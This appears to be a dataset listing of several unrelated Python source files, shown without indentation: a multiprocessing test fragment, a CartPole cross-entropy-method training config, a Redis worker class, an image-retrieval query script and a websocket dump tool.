# This won't block due to the above 'assert readable'.
result = children_alive.recv()
except EOFError:
pass # Test passes.
except EnvironmentError:
# Windows can raise BrokenPipeError. EnvironmentError is caught for
# Python2/3 portability.
assert sys.platform.startswith('win'), "should only raise on windows"
# Test passes.
else:
# Oops, children_alive read something. It should be closed. If
# something was read, it's a message from the child telling us they
# are still alive!
raise RuntimeError("unreachable: {}".format(result))
finally:
# Cleanup.
children_alive.close()
|
desc_cem_classic_CartPoleV0.py | # -*- coding:utf8 -*-
# File : desc_cem_classic_CartPoleV0.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 10/08/2017
#
# This file is part of TensorArtist.
import os
import threading
import numpy as np
from tartist.app import rl
from tartist.core import get_env, get_logger
from tartist.core.utils.cache import cached_result
from tartist.core.utils.naming import get_dump_directory
from tartist.core.utils.meta import map_exec
from tartist.nn import opr as O
logger = get_logger(__file__)
__envs__ = {
'dir': {
'root': get_dump_directory(__file__),
},
'cem': {
'env_name': 'CartPole-v0',
'top_frac': 0.2,
'max_nr_steps': 200,
'inference': {
'nr_plays': 20
},
'demo': {
'nr_plays': 20
},
},
'trainer': {
'epoch_size': 200,
'nr_epochs': 50,
}
}
__trainer_cls__ = rl.train.EvolutionBasedTrainer
def make_network(env):
with env.create_network() as net:
state = O.placeholder('state', shape=(None, ) + get_input_shape())
logits = O.fc('fc', state, get_action_shape())
net.add_output(logits, name='policy')
def make_player(dump_dir=None):
p = rl.GymRLEnviron(get_env('cem.env_name'), dump_dir=dump_dir)
p = rl.LimitLengthProxyRLEnviron(p, get_env('cem.max_nr_steps'))
return p
def make_optimizer(env):
optimizer = rl.train.CEMOptimizer(env, top_frac=get_env('cem.top_frac'))
env.set_optimizer(optimizer)
@cached_result
def get_input_shape():
p = make_player()
p.restart()
input_shape = p.current_state.shape
del p
return input_shape
@cached_result
def get_action_shape():
return 1
def _policy2action(policy):
return int(policy > 0)
def _evaluate(player, func):
score = 0
player.restart()
while True:
policy = func(state=player.current_state[np.newaxis])['policy'][0]
reward, done = player.action(_policy2action(policy))
score += reward
if done:
player.finish()
break
return score
def main_inference_play_multithread(trainer):
def runner():
func = trainer.env.make_func()
func.compile(trainer.env.network.outputs)
player = make_player()
score = _evaluate(player, func)
mgr = trainer.runtime.get('summary_histories', None)
if mgr is not None:
mgr.put_async_scalar('inference/score', score)
nr_players = get_env('cem.inference.nr_plays')
pool = [threading.Thread(target=runner) for _ in range(nr_players)]
map_exec(threading.Thread.start, pool)
map_exec(threading.Thread.join, pool)
def main_train(trainer):
# Compose the evaluator
player = make_player()
def evaluate_train(trainer, p=player):
return _evaluate(player=p, func=trainer.pred_func)
trainer.set_evaluator(evaluate_train)
# Register plugins
from tartist.plugins.trainer_enhancer import summary
summary.enable_summary_history(trainer, extra_summary_types={
'inference/score': 'async_scalar',
})
summary.enable_echo_summary_scalar(trainer, summary_spec={
'inference/score': ['avg', 'max']
})
from tartist.plugins.trainer_enhancer import progress
progress.enable_epoch_progress(trainer)
from tartist.plugins.trainer_enhancer import snapshot
snapshot.enable_snapshot_saver(trainer, save_interval=1)
def on_epoch_before(trainer):
v = max(5 - trainer.epoch / 10, 0)
trainer.optimizer.param_std += v
def on_epoch_after(trainer):
if trainer.epoch > 0 and trainer.epoch % 2 == 0:
main_inference_play_multithread(trainer)
trainer.register_event('epoch:before', on_epoch_before, priority=5)
# This one should run before monitor.
trainer.register_event('epoch:after', on_epoch_after, priority=5)
trainer.train()
def main_demo(env, func):
dump_dir = get_env('dir.demo', os.path.join(get_env('dir.root'), 'demo'))
logger.info('Demo dump dir: {}'.format(dump_dir))
player = make_player(dump_dir=dump_dir)
repeat_time = get_env('cem.demo.nr_plays', 1)
def get_action(inp, func=func):
policy = func(state=inp[np.newaxis])['policy'][0]
return _policy2action(policy)
for i in range(repeat_time):
player.play_one_episode(get_action)
logger.info('#{} play score={}'.format(i, player.stats['score'][-1]))
|
worker.py | import time
import datetime
import json
import redis
import threading
import sys
from logger.Logger import Logger, LOG_LEVEL
# Base Worker Class
# A worker is responsible for handling its set of operations and running on a thread
class Worker():
def __init__(self, config, main_thread_running, system_ready):
self.config = config
try:
self.r = config["redis"]
except KeyError:
self.r = redis.Redis(host='127.0.0.1', port=6379)
self.topic = config.get('topic', 'mudpi').replace(" ", "_").lower()
self.sleep_duration = config.get('sleep_duration', 15)
# Threading Events to Keep Everything in Sync
self.main_thread_running = main_thread_running
self.system_ready = system_ready
self.worker_available = threading.Event()
self.api = None
self.components = []
return
def init(self):
# print('Worker...\t\t\t\033[1;32m Initializing\033[0;0m'.format(**control))
return
def run(self):
t = threading.Thread(target=self.work, args=())
t.start()
return t
def work(self):
while self.main_thread_running.is_set():
if self.system_ready.is_set():
time.sleep(self.sleep_duration)
# This is only ran after the main thread is shut down
Logger.log(LOG_LEVEL["info"],
"Worker Shutting Down...\t\033[1;32m Complete\033[0;0m")
def dynamic_import(self, name):
# Split path of the class folder structure: {sensor name}_sensor . {SensorName}Sensor
components = name.split('.')
# Dynamically import root of component path
module = __import__(components[0])
# Get component attributes
for component in components[1:]:
module = getattr(module, component)
return module
def decode_message_data(self, message):
if isinstance(message, dict):
# print('Dict Found')
return message
elif isinstance(message.decode('utf-8'), str):
try:
temp = json.loads(message.decode('utf-8'))
# print('Json Found')
return temp
except:
# print('Json Error. Str Found')
return {'event': 'Unknown', 'data': message}
else:
# print('Failed to detect type')
return {'event': 'Unknown', 'data': message}
|
deep_query.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2016 - Present, Tianwei Shen, HKUST.
# Copyright 2017 - Present, Zixin Luo, HKUST.
"""
query images and get rank lists.
evaluate oxford5k (paris6k) benchmark datasets.
"""
from __future__ import print_function
import os
import sys
import time
from random import randint
from functools import partial
from tempfile import NamedTemporaryFile
from threading import Thread
from Queue import Queue
import tensorflow as tf
from sklearn.preprocessing import normalize as sknormalize
from sklearn.decomposition import PCA
from sklearn.cluster import KMeans
import numpy as np
import progressbar
from sklearn.externals import joblib
_file_path = os.path.abspath(sys.argv[0])
_cur_dir = os.path.dirname(_file_path)
sys.path.append(os.path.dirname(_cur_dir))
from tools.common import read_list, write_list, Notify
def normalize(x, copy=False):
"""
A helper function that wraps the function of the same name in sklearn.
This helper handles the case of a single column vector.
"""
if type(x) == np.ndarray and len(x.shape) == 1:
return np.nan_to_num(np.squeeze(sknormalize(x.reshape(1, -1), copy=copy)), copy=copy)
else:
return np.nan_to_num(sknormalize(x, copy=copy), copy=copy)
def simple_query_expansion(query_feat, db_feat, result, num_regions, top_k=10):
"""
Get the top-k closest (regional) vectors, average and re-query
"""
qe_feat = []
num_query = query_feat.shape[0] / num_regions
for i in range(num_query):
inds = result[i][0][0:top_k]
dists = result[i][1][0:top_k]
single_query = query_feat[i * num_regions:(i + 1) * num_regions]
for j in range(len(inds)):
weight = dists[j]/num_regions
single_query = single_query + weight * db_feat[inds[j] * num_regions:(inds[j] + 1) * num_regions]
qe_feat.append(single_query)
qe_feat = np.vstack(qe_feat)
qe_feat = normalize(qe_feat)
return qe_feat
def get_ap(inds, query_name, index_names, groundtruth_dir, ranked_dir=None, disp_each=True):
"""
Given a query, index data, and path to groundtruth data, perform the query,
and evaluate average precision for the results by calling to the compute_ap
script. Optionally save ranked results in a file.
:param ndarray inds:
the indices of index vectors in ascending order of distance
:param str query_name:
the name of the query
:param list index_names:
the name of index items
:param str groundtruth_dir:
directory of groundtruth files
:param str ranked_dir:
optional path to a directory to save ranked list for query
:returns float:
the average precision for this query
"""
if ranked_dir is not None:
# Create dir for ranked results if needed
if not os.path.exists(ranked_dir):
os.makedirs(ranked_dir)
rank_file = os.path.join(ranked_dir, '%s.txt' % query_name)
f = open(rank_file, 'w')
else:
f = NamedTemporaryFile(delete=False)
rank_file = f.name
f.writelines([index_names[i] + '\n' for i in inds])
f.close()
groundtruth_prefix = os.path.join(groundtruth_dir, query_name)
oxford_benchmark_prog = os.path.join('cpp', 'compute_ap')
cmd = ' %s %s' % (groundtruth_prefix, rank_file)
cmd = oxford_benchmark_prog + cmd
ap = os.popen(cmd).read()
# Delete temp file
if ranked_dir is None:
os.remove(rank_file)
if disp_each:
print(Notify.UNDERLINE, query_name, float(ap.strip()), Notify.ENDC)
return float(ap.strip())
def _prc_match_graph(query_features, db_features, num_regions, top_k, euclidean_dist, aml):
"""TensorFlow graph for PR-MAC distance calculation."""
num_regions = tf.constant(num_regions, dtype=tf.int32)
num_query = tf.shape(query_features)[0]/num_regions
num_db = tf.shape(db_features)[0]/num_regions
feat_dim = tf.shape(db_features)[1]
if euclidean_dist:
norm_db = tf.reshape(tf.reduce_sum(db_features * db_features, axis=1), [-1, 1])
def body(single_query):
"""Loop body."""
if euclidean_dist:
# compute L2 norm
norm_query = tf.reshape(tf.reduce_sum(single_query * single_query, axis=1), [-1, 1])
# distance matrix (Euclidean)
dist_mat = norm_query - 2 * \
tf.matmul(single_query, db_features, transpose_b=True) + tf.transpose(norm_db)
dist_seg = tf.reduce_min(tf.reshape(dist_mat, [-1, num_regions]), axis=1)
else:
dist_mat = tf.matmul(single_query, db_features, transpose_b=True)
dist_seg = tf.reduce_max(tf.reshape(dist_mat, [-1, num_regions]), axis=1)
max_rv_mat = tf.reshape(dist_seg, [num_regions, num_db])
if aml:
final_dist = tf.reduce_max(max_rv_mat, axis=0)
else:
final_dist = tf.reduce_sum(max_rv_mat, axis=0)
return final_dist
reshape_query_features = tf.reshape(query_features, (num_query, num_regions, feat_dim))
res_dist = tf.map_fn(lambda x: body(x), reshape_query_features, back_prop=False)
top_k = tf.squeeze(tf.cast(top_k, tf.int32))
if euclidean_dist:
sorted_dist, sorted_indx = tf.nn.top_k(-res_dist, top_k)
sorted_dist = -sorted_dist
else:
sorted_dist, sorted_indx = tf.nn.top_k(res_dist, top_k, name='dist')
sorted_indx = tf.cast(sorted_indx, tf.float32, name='rank')
return [sorted_dist, sorted_indx]
def match_gpu(query_features, db_features, num_regions, top, euclidean_dist=False, aml=False):
"""GPU supported PR-MAC."""
tf.reset_default_graph()
assert query_features.shape[1] == db_features.shape[1]
query_features = tf.constant(query_features, dtype=tf.float32, name='query_features')
db_features = tf.constant(db_features, dtype=tf.float32, name='db_features')
# a weird bug with tensorflow 1.3, otherwise it is of type 'Dimension'
num_query = int(int(query_features.shape[0]) / num_regions)
num_db = int(int(db_features.shape[0]) / num_regions)
top_k = top
if num_db < top:
top_k = num_db
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
tf_output = _prc_match_graph(query_features, db_features, num_regions, top_k, euclidean_dist, aml)
sess.run(tf.global_variables_initializer())
dist, indx = sess.run(tf_output)
query_result = []
for i in range(num_query):
query_result.append([indx[i].astype(np.int32), dist[i]])
return query_result
def read_feature(feature_list, euclidean_dist=False, rmac=False, mac=False, num_rv=None):
"""Read features stored in .npy."""
names = []
num_regions = 1
prog_bar = progressbar.ProgressBar()
prog_bar.max_value = len(feature_list)
feature = None
def _worker(q, feature, num_regions):
while True:
data = q.get()
feat = data[0]
idx = data[1]
if feat is None or idx is None:
return
if False:
# Not ready yet. KMeans or GMM to reduce regional vector number.
if idx % 100 == 0:
print(idx)
kmeans = KMeans(n_clusters=5, random_state=0).fit(feat)
trans_feat = kmeans.cluster_centers_
trans_feat = np.zeros([5, 512])
for i in range(feat.shape[0]):
trans_feat[kmeans.labels_[i]] += feat[i]
else:
feature[idx * num_regions:(idx + 1) * num_regions] = feat
q.task_done()
q = Queue()
worker_thread = None
for idx, val in enumerate(feature_list):
feat = np.load(val)
if num_rv is not None:
if num_rv > 0:
feat = feat[:, -num_rv:]
else:
feat = feat[:, (0, 5, 10)]
feat = np.squeeze(feat)
feat = feat.transpose()
if rmac:
feat = np.sum(feat, axis=0)
if mac:
feat = feat[0,:]
# initialization
if feature is None:
if len(feat.shape) == 2:
num_regions = feat.shape[0]
dim = feat.shape[1]
elif len(feat.shape) == 1:
dim = feat.shape[0]
else:
print(Notify.FAIL, 'Invalid feature', val, Notify.ENDC)
exit(-1)
feature = np.zeros([len(feature_list) * num_regions, dim])
worker_thread = Thread(target=_worker, args=(q, feature, num_regions))
worker_thread.daemon = True
worker_thread.start()
def graipher(pts, dim, K):
def calc_distances(p0, points):
return ((p0 - points)**2).sum(axis=1)
farthest_pts = np.zeros((K, dim))
farthest_pts[0] = pts[0]
distances = calc_distances(farthest_pts[0], pts)
for i in range(1, K):
idx = np.argmax(distances)
farthest_pts[i] = pts[idx]
distances = np.minimum(distances, calc_distances(farthest_pts[i], pts))
return farthest_pts
# sampled_feat = graipher(feat, dim, 5)
q.put([feat, idx])
names.append(os.path.splitext(os.path.basename(val))[0])
prog_bar.update(idx)
# poison pill
q.put([None, None])
worker_thread.join()
if not euclidean_dist:
feature = normalize(feature)
return num_regions, feature, names
def whitening(feat, num_regions, pca_thresh=None, out_dim=None, pca=None):
"""PCA whitening."""
if pca is not None:
# use pre-computed PCA
trans_feat = pca.transform(feat)
else:
# compute PCA here
if out_dim is None:
# use adaptive PCA
print(Notify.INFO, 'Adaptive PCA with threshold', pca_thresh, Notify.ENDC)
pca = PCA(n_components=pca_thresh, whiten=True, copy=True)
pca.fit(feat)
trans_feat = pca.transform(feat)
else:
# reduce to specified dimention
print(Notify.INFO, 'Reduce dimensionality to', out_dim, Notify.ENDC)
pca = PCA(n_components=out_dim, whiten=True, copy=True, random_state=0)
pca.fit(feat)
trans_feat = pca.transform(feat)
trans_feat = normalize(trans_feat)
return trans_feat, pca
def mask_prediction(rv0, rv1, path0, path1):
def _get_coord_and_scale(indx):
if indx == 0:
return (0, 0), 28
elif indx > 0 and indx < 10:
row = (indx - 1) / 3 * 7
col = (indx - 1) % 3 * 7
return (row, col), 14
elif indx >= 10 and indx < 35:
row = (indx - 10) / 5 * 5
col = (indx - 10) % 5 * 5
return (row, col), 8
def _get_mask_map(rv0, rv1, rv_num):
mask_map = np.zeros((28, 28), np.uint8)
r_inds = np.zeros(rv_num, np.int32)
r_dist = np.zeros(rv_num)
for i in range(rv_num):
tmp = np.multiply(rv0[i], rv1).sum(axis=1)
r_inds[i] = np.argmax(tmp)
if tmp[r_inds[i]] > 0.90:
if i == 0:
r_dist[i] = 1
elif i > 0 and i < 10:
r_dist[i] = 2
elif i >= 10 and i < 35:
r_dist[i] = 3
if r_dist[0] == 1:
print(Notify.INFO, 'Globally similar', Notify.ENDC)
for i in range(rv_num):
if r_dist[i] > 0:
coord, scale = _get_coord_and_scale(r_inds[i])
mask_map[coord[0]: coord[0] + scale,
coord[1]: coord[1] + scale] = r_dist[i] * 85
return np.uint8(mask_map)
rv_num = rv0.shape[0]
mask_map0 = _get_mask_map(rv1, rv0, rv_num)
mask_map1 = _get_mask_map(rv0, rv1, rv_num)
# Warn(Do not move): to show mask, add
#
# import matplotlib.pyplot as plt
# from scipy import misc
#
# and un-comment the following lines:
#img0 = misc.imread(path0)
#mask_map0 = misc.imresize(mask_map0, (896, 896))
#img0[:, :, 0] = mask_map0
#plt.subplot(121)
#plt.imshow(img0)
#img1 = misc.imread(path1)
#mask_map1 = misc.imresize(mask_map1, (896, 896))
#img1[:, :, 0] = mask_map1
#plt.subplot(122)
#plt.imshow(img1)
#plt.show()
def query(query_list, feature_list, out_dir, top=200,
pca_thresh=0.9, out_dim=None, pca_file='-1', qe_fn=None,
mask_pred=False, euclidean_dist=False, rmac=False, mac=False, aml=False):
"""Query by list."""
print(Notify.INFO, 'Read feature', Notify.ENDC)
print(Notify.INFO, 'Use R-MAC: ', rmac, Notify.ENDC)
num_regions, db_feat, image_names = read_feature(feature_list, euclidean_dist, rmac, mac)
# below codes are for predicted mask visualization.
itv = 10
while mask_pred:
idx0 = randint(itv, len(feature_list) - 1 - itv)
idx1 = randint(idx0 - itv, idx0 + itv)
print(Notify.INFO, 'Pair idx', (idx0, idx1), Notify.ENDC)
# FIXME: adapt the image ext.
image_path0 = feature_list[idx0].replace('npy', 'JPG')
image_path1 = feature_list[idx1].replace('npy', 'JPG')
# some images end with '.jpg'
if not os.path.exists(image_path0):
image_path0 = feature_list[idx0].replace('npy', 'jpg')
if not os.path.exists(image_path1):
image_path1 = feature_list[idx1].replace('npy', 'jpg')
rv0 = db_feat[idx0 * num_regions:(idx0 + 1) * num_regions]
rv1 = db_feat[idx1 * num_regions:(idx1 + 1) * num_regions]
mask_prediction(rv0, rv1, image_path0, image_path1)
print(Notify.INFO, '# Feature', len(feature_list), Notify.ENDC)
print(Notify.INFO, '# Dim', db_feat.shape[-1], Notify.ENDC)
print(Notify.INFO, '# Reginal vector', num_regions, Notify.ENDC)
# perform PCA whitening.
use_pca = (pca_thresh is not None or out_dim is not None or pca_file != '-1') and len(image_names) > out_dim
if pca_file != '-1':
pca_data = np.load(pca_file).item()
pca = PCA(whiten=True, copy=True, random_state=0)
pca.mean_ = pca_data['mean']
pca.components_ = pca_data['eigvec']
pca.explained_variance_ = pca_data['eigval']
else:
pca = None
if use_pca:
db_trans_feat, pca = whitening(db_feat, num_regions, pca_thresh, out_dim, pca=pca)
print(Notify.INFO, 'PCA-ed feature dim', db_trans_feat.shape[1], Notify.ENDC)
else:
print(Notify.WARNING, 'No whitening', Notify.ENDC)
db_trans_feat = db_feat
if query_list is not None:
query_num_regions, query_feat, query_names = read_feature(query_list, euclidean_dist, rmac, mac)
assert(num_regions == query_num_regions)
if use_pca:
query_trans_feat, _ = whitening(query_feat, num_regions, pca=pca)
else:
query_trans_feat = query_feat
query_num = len(query_list)
else:
query_trans_feat = db_trans_feat
query_num = len(feature_list)
# output path name
if not os.path.exists(out_dir):
os.makedirs(out_dir)
match_index_file = os.path.join(out_dir, 'match_pairs')
print(Notify.INFO, 'Compute nn distance', Notify.ENDC)
start = time.time()
query_result = match_gpu(query_trans_feat, db_trans_feat, num_regions,
top, euclidean_dist=euclidean_dist, aml=aml)
end = time.time()
print(Notify.INFO, 'Time cost in matching', end - start, 's', Notify.ENDC)
if qe_fn is not None:
for _ in range(ARGS.et):
print(Notify.INFO, 'Expand queries and re-match', Notify.ENDC)
qe_feature = qe_fn(query_trans_feat, db_trans_feat, query_result, num_regions)
query_result = match_gpu(qe_feature, db_trans_feat, num_regions, top, aml=aml)
content = []
aps = []
for i in range(query_num):
inds = query_result[i][0]
dists = query_result[i][1]
content.extend([' '.join([str(i), str(inds[j]), str(dists[j]/num_regions)]) for j in range(len(inds))])
write_list(content, match_index_file)
return 0
if __name__ == '__main__':
from argparse import ArgumentParser
PARSER = ArgumentParser()
PARSER.add_argument('--dataset_root', dest='dataset_root', type=str, default=None,
help='dataset root dir')
PARSER.add_argument('--feature_list', dest='feature_list', type=str, required=True,
help='path to the feature file containing all .npy files')
PARSER.add_argument('--query_list', dest='query_list', type=str, default=None,
help='path to the query list containing all .npy files')
PARSER.add_argument('--out_dir', dest='out_dir', type=str,
default='./', help='optional path to save ranked output')
PARSER.add_argument('--top', dest='top', type=int,
default=200, help='top match output')
PARSER.add_argument('--pca_thresh', dest='pca_thresh',
type=float, default=None, help='threshold for pca')
PARSER.add_argument('--out_dim', dest='out_dim', type=int,
default=None, help='dimension of final feature, control whether and how to do pca')
PARSER.add_argument('--pca_file', dest='pca_file', type=str,
default='-1', help='path to pre-computed pca file')
PARSER.add_argument('--qe', dest='qe', type=int,
default=None, help='perform query expansion with this many top results')
PARSER.add_argument('--et', dest='et', type=int,
default=0, help='query expansion times')
PARSER.add_argument('--mask_pred', dest='mask_pred', default=False,
action='store_true', help='whether to predict and visualize mask')
PARSER.add_argument('--euclidean_dist', dest='euclidean_dist', default=False,
action='store_true', help='test each data set separately')
PARSER.add_argument('--rmac', dest='rmac', default=False,
action='store_true', help='use r-mac instead of pr-mac when --rmac is set')
PARSER.add_argument('--mac', dest='mac', default=False,
action='store_true', help='use mac --mac is set')
PARSER.add_argument('--aml', dest='aml', default=False,
action='store_true', help='use aml --aml is set')
ARGS = PARSER.parse_args()
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
QE_FN = partial(simple_query_expansion, top_k=ARGS.qe) if ARGS.qe > 0 else None
# read feature list
FEATURE_LIST = read_list(ARGS.feature_list)
if ARGS.dataset_root != None:
FEATURE_LIST = [os.path.join(ARGS.dataset_root, p) for p in FEATURE_LIST]
# read query_list if it's different from feature_list
QUERY_LIST = None
if ARGS.query_list is not None:
QUERY_LIST = read_list(ARGS.query_list)
if ARGS.dataset_root != None:
QUERY_LIST = [os.path.join(ARGS.dataset_root, p) for p in QUERY_LIST]
if not os.path.exists(ARGS.out_dir):
os.mkdir(ARGS.out_dir)
# compute aggregated features and run the evaluation
mAP = query(QUERY_LIST, FEATURE_LIST, ARGS.out_dir, ARGS.top,
ARGS.pca_thresh, ARGS.out_dim, ARGS.pca_file, QE_FN,
ARGS.mask_pred, ARGS.euclidean_dist, ARGS.rmac, ARGS.mac, ARGS.aml) |
wsdump.py | #!/Users/justin.bassett/code/exchange-bot/exchangebot/bin/python2.7
import argparse
import code
import sys
import threading
import time
import ssl
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = map(str.strip, args.headers.split(','))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if not args.verbose and opcode in OPCODE_DATA:
msg = data
elif args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.